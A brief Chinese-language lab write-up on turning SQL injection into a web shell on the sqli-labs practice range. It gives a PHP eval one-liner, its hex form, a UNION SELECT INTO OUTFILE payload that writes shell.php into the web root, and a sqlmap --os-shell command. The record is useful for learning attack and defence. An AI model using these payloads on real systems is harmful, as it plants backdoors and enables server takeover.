into outfile get shell
1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值
2.假设我们已经得到了sql-lab靶场的网站根目录路径
3.准备一句话木马<?php eval(@$_REQUEST[x]);? >
4.将一句话木马十六进制编码
在网站转换成了十六进制:3c3f706870206576616c2840245f524551554553545b785d293b3f203e
5.写下?id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录
尝试使用--so-shell来getshell
sqlmap
(1)sqlmap.py -u 127.0.0.1/sqli-labs-master/Less-1/?id=1 --os-shell
(2)选择语言为php
(3)手动填入路径
最终还是没有写入成功
最终分析,应该是更改secure_file_priv修改后没用重启mysql,mysql没有及时更新配置文件,重启之后登录Mysql-Front查看secure_file_priv的值,此次secure_file_priv成为空值
再次在sql-lab第一关输入payload:?id=-1' union select 1,2,0x3c3f706870206576616c28245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+
一句话木马成功写入
github下载蚁剑,连接成功
再继续做--os-shell的实验
tmpbfnyt.php 用来执行系统命令
tmpuwwna.php 用来上传文件